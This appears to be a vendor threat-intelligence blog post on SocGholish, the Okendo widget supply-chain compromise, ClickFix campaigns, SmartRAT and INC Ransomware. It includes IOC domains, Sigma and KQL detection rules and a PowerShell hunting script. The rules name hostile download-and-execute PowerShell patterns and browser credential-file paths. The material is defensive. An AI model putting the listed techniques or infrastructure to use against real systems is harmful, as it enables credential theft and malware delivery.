Back to Intelligence

SocGholish Disruption & SmartRAT Supply Chain Surge: OTX Pulse Analysis — Credential Theft & Ransomware

SA
Security Arsenal Team
June 18, 2026
6 min read

Executive Summary

Recent OTX Pulse data from June 2026 indicates a volatile threat landscape where law enforcement disruption of legacy infrastructure (SocGholish/Operation Endgame) has been met with immediate innovation by threat actors. We are observing a surge in AI-generated ClickFix campaigns and supply chain compromises (Okendo Reviews) serving as primary vectors for InfoStealers (LummaC2, ACRStealer) and Remote Access Trojans (SmartRAT, NetSupport). These initial access vectors are directly fueling the rise of INC Ransomware, which has aggressively filled the void left by LockBit and BlackCat, utilizing rewritten Rust-based encryptors and Cobalt Strike beacons for lateral movement.

Threat Actor / Malware Profile

Primary Vectors & Malware

  • SocGholish (Fake Updates): Despite Operation Endgame disrupting TA569 (GOLD PRELUDE) and taking down 106 servers, residual hostnames and the tactic of fake browser updates remain high-risk for drive-by downloads delivering IcedID, Pikabot, and QakBot.
  • SmartApeSG (Supply Chain): Leveraging the compromised Okendo Reviews widget to inject malicious JavaScript (okendo-reviews.js). This acts as a loader for SmartRAT and NetSupport, facilitating long-term persistence in retail environments.
  • ClickFix (AI-Generated): A campaign targeting Brazilian finance sectors using typosquatting (e.g., crefisa.online) and fake CAPTCHAs to trick users into running PowerShell scripts that deploy SmartRAT and Banana RAT.
  • INC Ransomware: A top-tier RaaS operation (2026) utilizing Rust-based cross-platform encryptors. Affiliates use Cobalt Strike and credential theft (via stealers) to move laterally before encryption.

Attack Chain

  1. Initial Access: Compromised WordPress sites (SocGholish), Malicious JS Injection (Okendo), or Typosquatting domains (ClickFix).
  2. Execution: User interaction with fake updates/captchas triggers PowerShell or JScript to download payloads.
  3. Persistence: Deployment of InfoStealers (LummaC2, AgentTesla) to harvest session cookies and credentials, or RATs (SmartRAT) for hands-on-keyboard access.
  4. Lateral Movement: Valid credentials are used to deploy Cobalt Strike beacons.
  5. Impact: Deployment of INC Ransomware encryptors for double-extortion.

IOC Analysis

SOC teams should prioritize the following indicators extracted from the live pulses:

  • Hostnames (Compromised Infrastructure): trademark.iglesiaelarca.com, promo.summat10n.org. These are WordPress sites hijacked to host SocGholish payloads.
  • Domains (C2 & Typosquatting): windowsupdate-cdn.com (Fake update/ClickFix), incblog.su (INC Ransomware), wigletticks.com (Okendo C2).
  • File Hashes: Multiple MD5 and SHA256 hashes associated with SmartRAT, LummaC2, and INC payloads. These should be blocked in EDR solutions.
  • URLs: Specific endpoints for the Okendo supply chain attack (http://cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js). Note: While the domain is legitimate, this specific path was weaponized.

Detection Engineering

Sigma Rules

YAML
title: Potential SocGholish Fake Browser Update Activity
id: 485c0b9c-6b3a-4b3f-9c7d-1c0e5e7e1e1f
description: Detects potential SocGholish activity via fake browser update scripts often spawned by browser processes.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/614a8f9c7c8e0f0b8c7e1e1f
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
        Image|endswith:
            - '\mshta.exe'
            - '\powershell.exe'
            - '\cmd.exe'
            - '\wscript.exe'
        CommandLine|contains:
            - 'update'
            - 'install'
            - 'browser'
    condition: selection
falsepositives:
    - Legitimate software updates initiated by browser
level: high
---
title: SmartRAT ClickFix PowerShell Execution
id: 615c0b9c-6b3a-4b3f-9c7d-1c0e5e7e1e20
description: Detects PowerShell execution patterns associated with ClickFix campaigns (Fake Captcha/BSOD) often using encoded commands.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/614a8f9c7c8e0f0b8c7e1e20
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_powershell:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'FromBase64String'
            - 'DownloadString'
            - 'IEX'
    selection_suspicious_context:
        CommandLine|contains:
            - 'captcha'
            - 'bsod'
            - 'windowsupdate'
            - 'cdn'
    condition: all of selection_*
falsepositives:
    - Administrative scripts
level: critical
---
title: InfoStealer Browser Credential Access
id: 715c0b9c-6b3a-4b3f-9c7d-1c0e5e7e1e21
description: Detects processes accessing browser credential files, a common behavior of LummaC2, Vidar, and RedLine.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/614a8f9c7c8e0f0b8c7e1e21
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    category: file_access
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\Mozilla\Firefox\Profiles\'
            - '\AppData\Local\BraveSoftware'
    filter_legit:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\brave.exe'
    condition: selection and not filter_legit
falsepositives:
    - Backup software accessing browser data
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and Typosquatting domains in Network Events
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in (
    'crefisa.online', 
    'windowsupdate-cdn.com',
    'wigletticks.com',
    'wizzleticks.com',
    'incblog.su',
    'comples.biz',
    'dafkov.shop'
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP

// Hunt for Suspicious PowerShell Execution associated with Fake Updates
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ 'powershell.exe'
| where ProcessCommandLine has_any ('FromBase64String', 'DownloadString', 'IEX')
| where ProcessCommandLine has_any ('update', 'captcha', 'bsod')
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell
# IOC Hunt for SmartRAT and SocGholish Indicators
# Checks DNS Cache and Hosts file for malicious domains

$MaliciousDomains = @(
    'crefisa.online',
    'windowsupdate-cdn.com',
    'wigletticks.com',
    'wizzleticks.com',
    'incblog.su',
    'trademark.iglesiaelarca.com',
    'content.garretttrails.org',
    'promo.summat10n.org',
    'billing.roofnrack.us',
    'api-app.uppercrafteroom.com'
)

Write-Host "[+] Checking DNS Cache for Malicious Domains..." -ForegroundColor Cyan
$DnsCache = Get-DnsClientCache
foreach ($Domain in $MaliciousDomains) {
    $Matches = $DnsCache | Where-Object { $_.Entry -like "*$Domain*" }
    if ($Matches) {
        Write-Host "[!] FOUND: $Domain in DNS Cache" -ForegroundColor Red
        $Matches | Format-List Entry, Data, Type
    }
}

Write-Host "[+] Checking Hosts File for Malicious Domains..." -ForegroundColor Cyan
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $MaliciousDomains) {
        if ($HostsContent -match $Domain) {
            Write-Host "[!] FOUND: $Domain in Hosts File" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Hunt Complete." -ForegroundColor Green

Response Priorities

  • Immediate:
    • Block all IOCs (domains, hostnames, IPs) at the perimeter and proxy.
    • Investigate systems communicating with wigletticks.com or windowsupdate-cdn.com.
    • Isolate devices showing signs of PowerShell injection (FromBase64String) triggered by browser processes.
  • 24 Hours:
    • Conduct credential auditing for users on affected devices. If InfoStealers (LummaC2, AgentTesla) were executed, assume credentials are compromised and force password resets.
    • Review e-commerce platforms for the Okendo widget compromise; verify JS integrity.
  • 1 Week:
    • Implement application control to block mshta.exe and wscript.exe from browser processes.
    • Update supply chain security policies to verify integrity of 3rd party JavaScript widgets (e.g., Subresource Integrity checks).
    • Enhance user awareness training regarding "Fake Browser Updates" and "Fake CAPTCHA" social engineering tactics.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialssmartratsocgholishinc-ransomwaresupply-chain-attacklummac2

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action